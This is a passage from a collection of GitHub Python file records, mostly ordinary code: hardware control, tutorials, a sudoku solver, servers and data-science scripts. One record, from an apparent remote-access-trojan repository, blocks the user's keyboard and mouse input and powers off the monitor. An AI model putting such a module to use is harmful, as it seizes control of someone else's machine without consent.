{}'\r\n      warnings.warn(wfs.format(k), FutureWarning)\r\n  return _set_data(roster_id, _roster_data, session=session)\r\n","repo_name":"FUMBBLPlus/pyfumbbl","sub_path":"pyfumbbl/roster.py","file_name":"roster.py","file_ext":"py","file_size_in_byte":8885,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"4535394112","text":"# This python script runs a bipolar stepper motor in a full-step sequence for a set number of steps at a specific speed in revolutions per minute.\n# Written by Briana Bouchard \n\nimport RPi.GPIO as GPIO\nimport time\nimport board\nimport digitalio\n\n\n# Initialize pins using BCM mode (GPIO pin numbers not board numbers)\nyellow = digitalio.DigitalInOut(board.D18)\nyellow.direction = digitalio.Direction.OUTPUT\nred = digitalio.DigitalInOut(board.D17)\nred.direction = digitalio.Direction.OUTPUT\ngray = digitalio.DigitalInOut(board.D27)\ngray.direction = digitalio.Direction.OUTPUT\ngreen = digitalio.DigitalInOut(board.D22)\ngreen.direction = digitalio.Direction.OUTPUT\n\n# Define direction values\ncw = 1\nccw = 0\n\n# Define the steps per revolution for the motor \nsteps_rev = 200\n\ndef setMotor(current_step, delay):\n# This function provides the step sequence\n\n    if current_step == 0:\n        yellow.value = True\n        red.value = False\n        gray.value = True\n        green.value = False\n        time.sleep(delay)\n\n    elif current_step == 1:\n        yellow.value = False\n        red.value = True\n        gray.value = True\n        green.value = False\n        time.sleep(delay)\n\n    elif current_step == 2:\n        yellow.value = False\n        red.value = True\n        gray.value = False\n        green.value = True\n        time.sleep(delay)\n    \n    elif current_step == 3:\n        yellow.value = True\n        red.value = False\n        gray.value = False\n        green.value = True\n        time.sleep(delay)\n\n\ndef moveSteps(input_steps, speed): \n# This function tracks the number of steps remaining based on the step input and the loop cycles\n\n    current_step = 0\n    delay = 60/(steps_rev*speed)\n    \n    # Determines the direction based on sign of input_steps \n    if input_steps > 0:\n        direction = ccw\n    if input_steps < 0:\n        direction = cw\n    \n    for steps_remaining in range (abs(input_steps), 0, -1):\n        if direction == cw: \n            if current_step >= 0 and current_step < 3:\n                current_step = current_step + 1\n            elif current_step == 3:\n                current_step = 0\n        if direction == ccw: \n            if current_step <= 3 and current_step > 0:\n                current_step = current_step - 1\n            elif current_step == 0:\n                current_step = 3\n        \n        setMotor(current_step, delay)\n    \n    print(\"Stepping complete! Your motor completed \" + str(abs(input_steps)) + \" steps at \" + str(speed)+ \" revolutions per minute\")\n    \n\nwhile True:\n    # Define the steps per revolution for the motor 
\n    steps_rev = 200\n    \n    # Set the number of steps to move and the speed in revolutions per minute\n    moveSteps(-200, 20)\n    \n    break\n","repo_name":"kellymacdonald/ME35","sub_path":"pid_test.py","file_name":"pid_test.py","file_ext":"py","file_size_in_byte":2737,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72138163254","text":"'''\nif condition:\n    do this\nelse:\n    do this\n\nThe comparison operators are the same as in Java\n'''\n\nprint(\"Welcome to the rollercoaster!\")\nheight = int(input(\"What is your height in cm: \"))\nif height > 130:\n    print(\"You can ride the rollercoaster!\")\nelse: \n    print(\"Sorry, you have to grow taller before you can ride\")\n\n\n# Check whether a number is even or odd\nnumber = int(input(\"Which number do you want to check? 
\"))\n\nif number%2 == 0:\n print(\"This is an even number.\")\nelse:\n print(\"This is an odd number.\")\n\n# Condiciones anidadas y elif\n\nprint(\"Welcome to the rollercoaste!\")\nheight = int(input(\"What is your height in cm: \"))\nif height > 130:\n print(\"You can ride the rollercoaster!\")\n age = int(input(\"What is your age? \"))\n if age <= 18:\n print(\"Please, pay $7\")\n elif age > 18 and age < 25:\n print(\"Please, pay $70\")\n else:\n print(\"Please, pay $12\")\nelse: \n print(\"Sorry, you have to grow taller before you can ride\")\n\n\n# BMI 2.0\n\nheight = float(input(\"enter your height in m: \"))\nweight = float(input(\"enter your weight in kg: \"))\nw = float(weight)\nh = float(height)\nBMI = round(w/h**2)\n\nif BMI < 18.5:\n print(f\"Your BMI is {BMI}, you are underweight.\")\nelif BMI > 18.5 and BMI < 25:\n print(f\"Your BMI is {BMI}, you have a normal weight.\")\nelif BMI > 25 and BMI < 30:\n print(f\"Your BMI is {BMI}, you are slightly overweight\")\nelif BMI > 30 and BMI < 35:\n print(f\"Your BMI is {BMI}, you are obese.\")\nelse:\n print(f\"Your BMI is {BMI}, you are clinically obese.\")\n\n\n# Calcular si un año es bisiesto\n\nyear = int(input(\"Which year do you want to check? \"))\n\nif year%4 == 0:\n if year%100 == 0: \n if year%400 == 0:\n print(\"Leap year\")\n else:\n print(\"Not leap year\")\n else:\n print(\"Leap year\")\nelse:\n print(\"Not leap year\")\n\n\n# Pizza order\n\nprint(\"Welcome to Python Pizza Deliveries!\")\nsize = input(\"What size pizza do you want? S, M, or L \")\nadd_pepperoni = input(\"Do you want pepperoni? Y or N \")\nextra_cheese = input(\"Do you want extra cheese? Y or N \")\nbill = 0\n# Tamaño pizza\nif size == 'S':\n bill += 15\n if add_pepperoni == 'Y':\n bill += 2 \nelif size == 'M':\n bill += 20\n if add_pepperoni == 'Y':\n bill += 3 \nelse:\n bill += 25\n if add_pepperoni == 'Y':\n bill += 3 \n\nif extra_cheese == 'Y':\n bill += 1\n\nprint(f\"Your final bill is: ${bill}\")","repo_name":"cynthiatcelorio/100_days_of_code-Pyhton","sub_path":"days_1-10/day3 (Conditional, Logical operatos, code blocks and scope)/Control_flow.py","file_name":"Control_flow.py","file_ext":"py","file_size_in_byte":2402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"9773518213","text":"from copy import deepcopy\nfrom sys import exit\n\nclass Board:\n def __init__(self, board):\n # squares is a list of all 81 squares on the board in row order\n self.squares = []\n for i in range(0,81):\n row = i//9\n col = i%9\n if board[row][col] != \".\" and board[row][col] != \"0\":\n self.squares.append([int(board[row][col])])\n else:\n self.squares.append([1,2,3,4,5,6,7,8,9])\n\n #groups holds all the rows, columns and 3x3 squares\n self.groups = []\n coldata = []\n bigsquaredata = []\n for i in range(0,9):\n coldata.append([])\n bigsquaredata.append([])\n for row in range(0,9):\n rowdata = []\n for col in range(0,9):\n # append a *reference* to the relevant square to the row\n square = self.squares[row*9 + col]\n rowdata.append(square)\n coldata[col].append(square)\n bigrow = row//3\n bigcol = col//3\n bigsquaredata[bigrow*3 + bigcol].append(square)\n self.groups.append(rowdata)\n for i in range(0,9):\n self.groups.append(coldata[i])\n for i in range(0,9):\n self.groups.append(bigsquaredata[i])\n\n # eliminate values that have already been solved\n def eliminate(self):\n removed = False\n for g in self.groups:\n # go through the group, building a list of already solved values\n already_solved = []\n 
for square in g:\n if len(square) == 1:\n already_solved.append(square[0])\n\n # if an already solved value is in another square in this\n # group, remove it\n for square in g:\n if len(square) > 1:\n for d in already_solved:\n if d in square:\n square.remove(d)\n removed = True\n return removed\n\n # if there's only one copy of a value in a group, finalize it.\n def only_one(self):\n removed = False\n for g in self.groups:\n counts = [100]\n for i in range(0,9):\n counts.append(0)\n for square in g:\n if len(square) == 1:\n counts[square[0]] += 10 # don't bother with this one, it's done\n else:\n for num in square:\n counts[num] += 1\n \n for i in range(1,10):\n if counts[i] == 1:\n for square in g:\n if i in square:\n # this is the square that has the only value i,\n # so remove everything else from this square\n for num in square.copy():\n if num != i:\n # can't reassign square - need to\n # modify the original list\n square.remove(num)\n removed = True\n return removed\n\n def check_doubles(self):\n for g in self.groups:\n counts = []\n for i in range(0,9):\n counts.append(0)\n for square in g:\n if len(square) == 1:\n counts[square[0] - 1] += 1\n for i in range(0,9):\n if counts[i] > 1:\n #print(\"count of \", counts[i], \"in group\", g)\n return False\n return True\n\n def eval_move(self):\n progress = True\n while progress:\n progress = self.eliminate()\n progress = progress or self.only_one()\n return self.check_doubles()\n\n def finished(self):\n for square in self.squares:\n if len(square) != 1:\n return False\n return True\n \n def search(self):\n i = 0\n for square in self.squares:\n if len(square) > 1:\n for value in square:\n # clone the game so we can test a hypothesis and\n # roll back if we're wrong\n clone = deepcopy(self)\n\n # test the hypothesis that the i'th square should be 'value'\n clone.squares[i][:] = [value]\n\n # test the consequences of the move\n result = clone.eval_move()\n if result == False:\n #test revealed a wrong move, so try the next option\n continue\n\n # have we finished the board?\n if clone.finished():\n print(\"Finished!\")\n print(clone)\n return True\n\n # OK, not finished, but no immediate\n # contradiction. Continue searching from this\n # position\n if clone.search():\n # we finished!\n return True\n\n # If we get here, none of these moves worked, so the\n # problem was with an earlier move. 
We'll try again\n                # from an earlier move.\n                return False\n            i += 1\n        return False\n    \n    def __str__(self):\n        s = \"\"\n        for row in range(0,9):\n            if row == 3 or row == 6:\n                s += \"---+---+---\\n\"\n            for col in range(0,9):\n                if col == 3 or col == 6:\n                    s += \"|\"\n                if len(self.groups[row][col]) == 1:\n                    s += str(self.groups[row][col][0])\n                else:\n                    s += \".\"\n            s += \"\\n\"\n        return s\n\n\ninitboard = [\n    \"...251..3\",\n    \".51......\",\n    \".2..3....\",\n    \"6..7....8\",\n    \"5.....7.2\",\n    \"1....4..9\",\n    \"....8..9.\",\n    \"......82.\",\n    \"4..312...\"]\n\ninitboard2 = [\n    \"8...4127.\",\n    \"......9..\",\n    \"4..7.6...\",\n    \"1.24.....\",\n    \".6.....8.\",\n    \".....75.1\",\n    \"...6.9..3\",\n    \"..1......\",\n    \".4628...5\"]\n\ninitboard3 = [\n    \".9....1..\",\n    \"873.4..9.\",\n    \"..68.....\",\n    \"54.7..8..\",\n    \".........\",\n    \"..7..4.31\",\n    \".....89..\",\n    \".6..7.512\",\n    \"..1....7.\"]\n\n\ndef loadtests(filename):\n    with open(filename, \"rt\") as f:\n        for line in f:\n            print(line)\n            if len(line) >= 81:\n                board = []\n                for i in range(0,9):\n                    board.append(line[i*9:(i+1)*9])\n                game = Board(board)\n                print(game)\n                game.search()\n\nrun_tests = True\nif run_tests:\n    #loadtests(r\"top95\")\n    loadtests(r\"msk_009\")\nelse:\n    game = Board(initboard)\n    print(game)\n    game.search()\n\n","repo_name":"michaelkhot/ENGF0002-2019","sub_path":"Topics/09_Search_etc/sudoku/sudoku.py","file_name":"sudoku.py","file_ext":"py","file_size_in_byte":6889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"74951441011","text":"from flask import Flask, render_template, request\r\n\r\napp = Flask(__name__, template_folder=\"\")\r\n\r\n@app.route(\"/\", methods=[\"GET\",\"POST\"]) \r\ndef home():\r\n    if (request.method == \"GET\"):\r\n        return render_template(\"index.html\")\r\n    else:\r\n        if (request.form[\"num1\"] != \"\" and request.form[\"num2\"] != \"\"):\r\n            num1 = request.form[\"num1\"]\r\n            num2 = request.form[\"num2\"]\r\n\r\n            # request.form is the whole form mapping, so compare the submitted operation\r\n            # field instead (the field name \"op\" is an assumption about index.html)\r\n            if (request.form.get(\"op\") == \"mult\"):\r\n                mult = int(num1) * int(num2)\r\n                return str(mult) \r\n\r\n            else:\r\n                divi = int(num1) // int(num2)\r\n                return str(divi) \r\n        else:\r\n            return \"Please enter a valid value!\" \r\n\r\n\r\napp.run(port=8080, debug=True) \r\n","repo_name":"AlineR1beiro/Python","sub_path":"api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":709,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"25801191803","text":"def marcs_cakewalk(calorie):\n    \"\"\"Hackerrank Problem: https://www.hackerrank.com/challenges/marcs-cakewalk/problem\n\n    Marc loves cupcakes, but he also likes to stay fit. Each cupcake has a calorie count, and Marc can walk a distance\n    to expend those calories. 
If Marc has eaten j cupcakes so far, after eating a cupcake with c calories he must walk\n    at least 2**j x c miles to maintain his weight.\n\n    Solve:\n    To calculate the minimum miles, you solve based on the highest calorie to lowest calorie cupcake.\n    For example, for calorie = [5, 10, 7] he eats 10 first, then 7, then 5, walking\n    2**0*10 + 2**1*7 + 2**2*5 = 44 miles in total.\n\n    Args:\n        calorie (list): List of integers denoting the calories for each cupcake\n\n    Returns:\n        int: The minimum number of miles Marc must walk to maintain his weight\n    \"\"\"\n    calories = 0\n    for i, c in enumerate(sorted(calorie, reverse=True)):\n        calories += (2 ** i * c)\n    return calories\n\n\nif __name__ == \"__main__\":\n    assert marcs_cakewalk([5, 10, 7]) == 44\n    assert marcs_cakewalk([1, 3, 2]) == 11\n    assert marcs_cakewalk([7, 4, 9, 6]) == 79\n","repo_name":"kcc3/hackerrank-solutions","sub_path":"problem_solving/python/algorithms/greedy/marcs_cakewalk.py","file_name":"marcs_cakewalk.py","file_ext":"py","file_size_in_byte":1007,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72534520694","text":"def toggle_m():\r\n    import ctypes\r\n    import time\r\n    HWND_BROADCAST = 0xFFFF\r\n    WM_SYSCOMMAND = 0x0112\r\n    SC_MONITORPOWER = 0xF170\r\n    MONITOR_OFF = 2\r\n    MONITOR_ON = -1\r\n    def set_monitor_power(on):\r\n        hwnd = ctypes.windll.user32.GetForegroundWindow()\r\n        ctypes.windll.user32.PostMessageW(hwnd, WM_SYSCOMMAND, SC_MONITORPOWER, MONITOR_ON if on else MONITOR_OFF)\r\n    def block_input_events(block):\r\n        user32 = ctypes.windll.user32\r\n        user32.BlockInput(block)\r\n    set_monitor_power(False)\r\n    block_input_events(True)\r\n    time.sleep(10)\r\n    block_input_events(False)\r\n    set_monitor_power(True)\r\n\r\n","repo_name":"VenomTheLostOne/C2-FUN.rat","sub_path":"toggle_m_power.py","file_name":"toggle_m_power.py","file_ext":"py","file_size_in_byte":640,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41760464236","text":"import ccdc.molecule\n\ndef get_largest_components(m):\n    s = []\n    for c in m.components:\n        n = len(c.atoms)\n        id_n = int(str(c.identifier))\n        l = [(n, id_n)]\n        s.append(l)\n    t = sorted(s, key=lambda k: k[0])\n    largest_id = t[-1][0][1] - 1\n\n    return largest_id\n\ndef remove_waters(m):\n    keep = []\n    waters = 0\n    for s in m.components:\n        ats = [at.atomic_symbol for at in s.atoms]\n        if len(ats) == 3:\n            ats.sort()\n            if ats[0] == 'H' and ats[1] == 'H' and ats[2] == 'O':\n                waters += 1\n            else:\n                keep.append(s)\n        else:\n            keep.append(s)\n    new = ccdc.molecule.Molecule(m.identifier)\n    for k in keep:\n        new.add_molecule(k)\n    return new\n\ndef remove_single_oxygen(m):\n    keep = []\n    waters = 0\n    for s in m.components:\n        ats = [at.atomic_symbol for at in s.atoms]\n        if len(ats) == 1:\n            ats.sort()\n            if ats[0] == 'O':\n                waters += 1\n            else:\n                keep.append(s)\n        else:\n            keep.append(s)\n    new = ccdc.molecule.Molecule(m.identifier)\n    for k in keep:\n        new.add_molecule(k)\n    return new\n","repo_name":"Matgen-project/MOFNet","sub_path":"process/tools/remove_waters.py","file_name":"remove_waters.py","file_ext":"py","file_size_in_byte":1207,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"21"} +{"seq_id":"38609780217","text":"from dict_mysql import SerDatabase\nfrom socket import *\nfrom multiprocessing import Process\nfrom time import sleep\n\n\nclass Handle:\n    def __init__(self):\n        self.__userdata = SerDatabase()\n\n    def enroll(self, sock, data_list):\n        if data_list[1] == \"U\":\n            if self.__userdata.juge_user(data_list[2]):\n                sock.send(b\"ok\")\n            else:\n                sock.send(b\"fail\")\n        elif data_list[1] == 
\"P\":\n self.__userdata.storage_user(data_list[2], data_list[3])\n sock.send(\"注册成功\".encode())\n\n def login(self, sock, data_list):\n name = data_list[1]\n password = data_list[2]\n if self.__userdata.juge_user(name):\n sock.send(b\"n_wrong\")\n else:\n if self.__userdata.juge_passwd(name, password):\n sock.send(b\"ok\")\n else:\n sock.send(b\"p_wrong\")\n\n def find(self, sock, data_list):\n word = data_list[1]\n mean = self.__userdata.word_mean(word)\n if mean:\n sock.send(mean.encode())\n else:\n sock.send(b\"fail\")\n self.__userdata.sto_history(data_list[-1], word)\n\n def history(self, sock, data_list):\n tuple_his = self.__userdata.select_his(data_list[1])\n if tuple_his:\n for his in tuple_his:\n sleep(0.1)\n sock.send(str(his).encode())\n else:\n sock.send(\"目前无查询记录\".encode())\n sleep(0.1)\n sock.send(b\"done\")\n\n def request(self, sock, data):\n data_list = data.decode().split(\" \", 3)\n if data_list[0] == \"ENROLL\":\n self.enroll(sock, data_list)\n elif data_list[0] == \"LOGIN\":\n self.login(sock, data_list)\n elif data_list[0] == \"FIND\":\n self.find(sock, data_list)\n elif data_list[0] == \"HIS\":\n self.history(sock, data_list)\n elif data_list[0] == \"EXIT\":\n sock.close()\n\n\nclass SerProcess(Process):\n def __init__(self, sock):\n super().__init__(daemon=True)\n self.sock = sock\n self.__handle = Handle()\n\n def run(self):\n while True:\n data = self.sock.recv(1024)\n if data == b\"EXIT \":\n self.sock.close()\n break\n self.__handle.request(self.sock, data)\n\n\nclass Server:\n def __init__(self, addr=(\"0.0.0.0\", 8888)):\n self.addr = addr\n self.__tcpsock = socket()\n self.__bind()\n self.__litsen()\n\n def __bind(self):\n self.__tcpsock.bind(self.addr)\n\n def __litsen(self):\n self.__tcpsock.listen(5)\n\n def main(self):\n while True:\n try:\n client, addr = self.__tcpsock.accept()\n print(addr, \"has connected.\")\n except KeyboardInterrupt:\n self.__tcpsock.close()\n return\n p = SerProcess(client)\n p.start()\n\n\nif __name__ == '__main__':\n ser = Server()\n ser.main()\n","repo_name":"Vuthur/project_dict","sub_path":"dict_online.py","file_name":"dict_online.py","file_ext":"py","file_size_in_byte":3013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"31803117774","text":"from moviepy.editor import VideoFileClip\nfrom moviepy.editor import ImageSequenceClip\nimport cv2\nimport glob\nimport argparse\nimport numpy as np\nimport sys\nfrom utils import show_images\nfrom camera_cal import Camera\nfrom perspective import Transform\nfrom lanes import Lane\n\ndef progress(count, total, suffix=''):\n bar_len = 60\n filled_len = int(round(bar_len * count / float(total)))\n\n percents = round(100.0 * count / float(total), 1)\n bar = '=' * filled_len + '-' * (bar_len - filled_len)\n\n sys.stdout.write('[{}] {}{} ...{}\\r'.format(bar, percents, '%', suffix))\n sys.stdout.flush()\n\ndef draw(warped, left_fit, right_fit, Minv, undist):\n # Generate x and y values for plotting\n ploty = np.linspace(0, warped.shape[0]-1, warped.shape[0] )\n left_fitx = left_fit[0]*ploty**2 + left_fit[1]*ploty + left_fit[2]\n right_fitx = right_fit[0]*ploty**2 + right_fit[1]*ploty + right_fit[2]\n\n # Create an image to draw the lines on\n color_warp = np.zeros_like(warped).astype(np.uint8)\n # color_warp = np.dstack((warp_zero, warp_zero, warp_zero))\n\n # Recast the x and y points into usable format for cv2.fillPoly()\n pts_left = np.array([np.transpose(np.vstack([left_fitx, ploty]))])\n pts_right = 
np.array([np.flipud(np.transpose(np.vstack([right_fitx, ploty])))])\n    pts = np.hstack((pts_left, pts_right))\n\n    # Draw the lane onto the warped blank image\n    cv2.fillPoly(color_warp, np.int_([pts]), (0,255, 0))\n\n    # Warp the blank back to original image space using inverse perspective matrix (Minv)\n    newwarp = cv2.warpPerspective(color_warp, Minv, (undist.shape[1], undist.shape[0]))\n    # Combine the result with the original image\n    result = cv2.addWeighted(undist, 1, newwarp, 0.3, 0)\n\n    return result\n\ndef add_text(img, left_curverad, right_curverad, center_offset_meters):\n    # Add info about radius and offset\n    font = cv2.FONT_HERSHEY_SIMPLEX\n    text1 = 'left_curverad {:5.2f} meters - right_curverad: {:5.2f}'.format(left_curverad, right_curverad)\n    if center_offset_meters < 0:\n        text2 = 'offset: {:2.3f} meters to the left'.format(abs(center_offset_meters))\n    else:\n        text2 = 'offset: {:2.3f} meters to the right'.format(abs(center_offset_meters))\n\n    cv2.putText(img, text1, (50, 30), font, 1, (0,0,255), 1, cv2.LINE_AA)\n    cv2.putText(img, text2, (50, 70), font, 1, (0,0,255), 1, cv2.LINE_AA)\n\n    return img\n\nif __name__ == '__main__':\n    \"\"\"\n    PARAMETERS, UTILS AND PATHS\n    \"\"\"\n    parser = argparse.ArgumentParser()\n    parser.add_argument('--caldir', type=str, default='camera_cal', \n                        help='directory to read calibration image files from')\n    parser.add_argument('--dir', type=str, default='test_images', \n                        help='directory to read test image files from')\n    parser.add_argument('--outputdir', type=str, default='frames', \n                        help='directory to write images to')\n    parser.add_argument('--debug', type=int, default=0, \n                        help='print images to screen')\n    FLAGS, unparsed = parser.parse_known_args()\n\n    clip = VideoFileClip(\"project_video.mp4\")\n    frames = int(clip.fps * clip.duration)\n    image_folder = FLAGS.outputdir\n    video_file = 'processed_video.mp4'\n\n    # pixel to meters conversion\n    xm_per_pix = 3.7/700 # meters per pixel in x dimension\n    pxl_to_meters_radius_ratio = 3.05\n\n    camera = Camera(FLAGS.caldir)\n    transform = Transform(camera, Transform.DEFAULT_SRC, Transform.DEFAULT_DEST)\n\n    \"\"\"\n    Loop over all frames:\n    - Convert image to birdseye view (includes undistort, threshold mask binary)\n    - Detect lanes and smooth between frames (Fit a second order polynomial to each lane, Calculate curves and vehicle offset)\n    - Draw lanes and add text\n    - Save frame\n\n    \"\"\"\n    lane = None\n    print('Processing video...')\n    for idx, frame in enumerate(clip.iter_frames()):\n        progress(idx+1, frames)\n        warped, mask = transform.birdseye(frame)\n\n        # Detect lanes and smooth between frames\n        if lane is None:\n            lane = Lane(camera, transform, warped)\n        else:\n            lane.advance_next_lane(warped)\n\n\n        # Draw_lanes\n        lane_image = lane.draw_lane(frame)\n\n        # save frame\n        if FLAGS.debug == 1:\n            show_images(frame, lane_image)\n        else :\n            cv2.imwrite('{}/frame_{:010d}.jpg'.format(image_folder, idx), cv2.cvtColor(lane_image, cv2.COLOR_BGR2RGB))\n    print('')\n","repo_name":"jfrattarola/CarND-Advanced-Lane-Lines","sub_path":"process_video.py","file_name":"process_video.py","file_ext":"py","file_size_in_byte":4486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"21307356322","text":"import tensorflow as tf\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport sklearn\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.datasets import fetch_california_housing\nimport pandas as pd\nfrom tensorflow import keras\nimport 
os\n\n\ndef f(x):\n    return 3.*x**2+2.*x-1\ndef approximate_derivative(f, x, eps=1e-3):\n    return (f(x + eps) - f(x - eps)) / (2. * eps)\n\nprint(approximate_derivative(f, 1))\n\n\ndef g(x1, x2):\n    return (x1 + 5) * (x2 ** 2)\n\ndef approximate_gradient(g, x1, x2, eps=1e-3):\n    gd_x1 = approximate_derivative(lambda x : g(x, x2), x1, eps)\n    gd_x2 = approximate_derivative(lambda x : g(x1, x), x2, eps)\n    return gd_x1, gd_x2\nprint(approximate_gradient(g, 2., 3.))\n\n# # Differentiate with TensorFlow, one variable at a time\n# x1 = tf.Variable(2.0)\n# x2 = tf.Variable(3.0)\n# with tf.GradientTape(persistent=True) as tape: # without persistent=True the tape is released after one gradient call and cannot be reused; with True it must be deleted manually\n# z = g(x1, x2)\n#\n# dz_x1 = tape.gradient(z, x1)\n# try:\n# dz_x2 = tape.gradient(z, x2)\n# except RuntimeError as ex:\n# print(ex)\n#\n# del tape\n\n\n# Differentiate with TensorFlow, both variables at once (the gradient)\nx1 = tf.Variable(2.0)\nx2 = tf.Variable(3.0)\nwith tf.GradientTape() as tape:\n    z = g(x1, x2)\n\ndz_x = tape.gradient(z, [x1, x2])\nprint(dz_x)\n\n# Differentiate with respect to constants\nx1 = tf.constant(2.0)\nx2 = tf.constant(3.0)\nwith tf.GradientTape() as tape:\n    tape.watch(x1) # watch() is required when taking partial derivatives with respect to constants\n    tape.watch(x2)\n    z = g(x1, x2)\n\ndz_x = tape.gradient(z, [x1, x2])\nprint(dz_x)\n\n\n# Differentiate several objective functions with respect to the same x\nx = tf.Variable(5.0)\nwith tf.GradientTape() as tape:\n    z1 = 3 * x\n    z2 = x ** 2\nprint(tape.gradient([z1, z2], x)) # yields the derivative of z1 plus the derivative of z2 with respect to x\n\n\n# Second-order derivatives\nx1 = tf.Variable(2.0)\nx2 = tf.Variable(3.0)\nwith tf.GradientTape(persistent=True) as outer_tape:\n    with tf.GradientTape(persistent=True) as inner_tape:\n        z = g(x1, x2)\n    inner_grads = inner_tape.gradient(z, [x1, x2])\nouter_grads = [outer_tape.gradient(inner_grad, [[x1, x2]])\n               for inner_grad in inner_grads]\ndel inner_tape\ndel outer_tape\n\n# Gradient descent implemented by hand\nlearning_rate = 0.01\nx = tf.Variable(0.0)\n\nfor _ in range(100):\n    with tf.GradientTape() as tape:\n        z = f(x)\n    gd_dx = tape.gradient(z, x)\n    x.assign_sub(learning_rate * gd_dx)\nprint(x)\n\n\n# GradientTape combined with a keras optimizer\nlearning_rate = 0.01\nx = tf.Variable(0.0)\n\noptimizer = keras.optimizers.SGD(lr=learning_rate)\nfor _ in range(100):\n    with tf.GradientTape() as tape:\n        z = f(x)\n    gd_dx = tape.gradient(z, x)\n    # x.assign_sub(learning_rate * gd_dx)\n    optimizer.apply_gradients([(gd_dx, x)])\nprint(x)","repo_name":"kanandian/machine_learning","sub_path":"tensorflow_learning_and_practice/charter3/4tf_diffs.py","file_name":"4tf_diffs.py","file_ext":"py","file_size_in_byte":2743,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"43629261454","text":"#!/usr/bin/env python3\nfrom classes.__init__ import CONN, CURSOR\nimport ipdb \n\nfrom classes.beach import Beach\nfrom classes.surfboard import Surfboard\nfrom classes.surfer import Surfer\nfrom classes.wave import Wave\n\nSurfer.drop_table()\nSurfboard.drop_table()\nWave.drop_table()\nBeach.drop_table()\n\nSurfer.create_table()\nSurfboard.create_table()\nWave.create_table()\nBeach.create_table()\n\n# Surfer.find_by_name()\n# Beach.find_by_name()\n\n# Surfboard.find_all()\n# Surfer.find_all()\n# Wave.find_all()\n\n\n\n# Surfboard.find_by_id()\n# Surfer.find_by_id()\n# Wave.find_by_id()\n# Beach.find_by_id()\n\n#surfers\nsurfer1 = Surfer.create('River', 'Ferguson', 26, 'Get Pitted')\nsurfer2 = Surfer.create('Caz', 'Mozeleski', 28, 'Hotdogger')\nsurfer3 = Surfer.create('Guy', 'buddy', 30, 'beat it kook')\nsurfer4 = Surfer.create('Buddy', 'Guy', 22, \"Hey Guyyy\")\nsurfer5 = Surfer.create('Craig', 'Dude', 22, \"Stoked\")\n\n#Surfboard\nboard1 = Surfboard.create('Al Merrick', 'Shortboard', 'Flyer', 
surfer1.id)\nboard2 = Surfboard.create('Takayama', 'Longboard', 'Noserider', surfer2.id)\nboard3 = Surfboard.create('Santa Cruz', 'Mid Length', 'Egg', surfer3.id)\nboard4 = Surfboard.create('Lost', 'Mid Length', 'Mayhem', surfer3.id)\nboard5 = Surfboard.create('Arakawa', 'Shortboard', 'Carver', surfer5.id)\nboard6 = Surfboard.create('Tokoro', 'Longboard', 'Spooner', surfer4.id)\nboard7 = Surfboard.create('Aipa', 'Shortboard', 'Islander', surfer1.id)\n\n#waves\nwave1 = Wave.create(10, 'Mean', 10, 10)\nwave2 = Wave.create(9, 'localized', 9, 10)\nwave3 = Wave.create(8, 'Super localized', 5, 4)\nwave4 = Wave.create(7, 'Worst locals ever', 10, 10)\n\n\n#beaches\nbeach1 = Beach.create('Pipeline', 'Hawaii', 10, wave1.id, surfer1.id)\nbeach2 = Beach.create('Sunset Beach', 'Hawaii', 9, wave2.id, surfer5.id)\nbeach3 = Beach.create('Velzy Land', 'Hawaii', 7, wave3.id, surfer3.id)\nbeach4 = Beach.create('Dirt Bags', 'California', 3, wave4.id, surfer2.id)\n\nprint('Debugger')\n\n\n\n#ipdb.set_trace()","repo_name":"riverferguson/surfer-project","sub_path":"lib/debug.py","file_name":"debug.py","file_ext":"py","file_size_in_byte":1944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"71854127466","text":"import xlrd \nimport matplotlib.pyplot as plt\nimport numpy as np\n\noutput_path = \"/Users/luochen/Documents/Research/papers/rebalance/\"\n\nfont_size = 10\nfont_weight = 100\nlabel_size = 11\ntitle_size = 11\nlegend_size = 11\nparams = {\n 'font.family': 'Times New Roman',\n 'font.weight': font_weight,\n 'axes.labelweight': font_weight,\n 'figure.titleweight': font_weight,\n 'axes.titlesize': title_size,\n 'axes.labelsize': label_size,\n 'legend.fontsize': legend_size,\n 'xtick.labelsize': label_size,\n 'ytick.labelsize': label_size,\n 'font.size': font_size,\n 'lines.linewidth':1,\n 'lines.markeredgewidth': 0,\n 'lines.markersize':5,\n \"legend.handletextpad\":0.2,\n \"legend.handlelength\":1.5,\n 'text.usetex': False,\n 'savefig.bbox':'tight',\n 'savefig.pad_inches':0,\n 'figure.figsize':(3.25, 2.3),\n \"legend.fancybox\":True,\n \"legend.shadow\":False,\n \"legend.framealpha\":0,\n \"legend.labelspacing\":0.2,\n \"legend.columnspacing\":0.5,\n \"legend.borderpad\":0.2,\n \"legend.borderaxespad\":0,\n \"hatch.color\":'white',\n \"hatch.linewidth\":'0.5',\n \"xtick.direction\": 'out',\n \"ytick.direction\": 'out',\n}\nplt.rcParams.update(params)\nplt.tight_layout()\n\nnames = [\"Hashing\", \"StaticHash\", \"DynaHash\", \"DynaHash-lazy-cleanup\"]\ncolors = ['tomato', 'dodgerblue', 'darkgray', 'orange']\n\n\nclass PlotOption(object):\n\n def __init__(self, x, y, legend='', color='black', linestyle='solid', marker=None, markevery=1, alpha=None, hatch=None, dashes=None):\n self.x = x\n self.y = y\n self.linestyle = 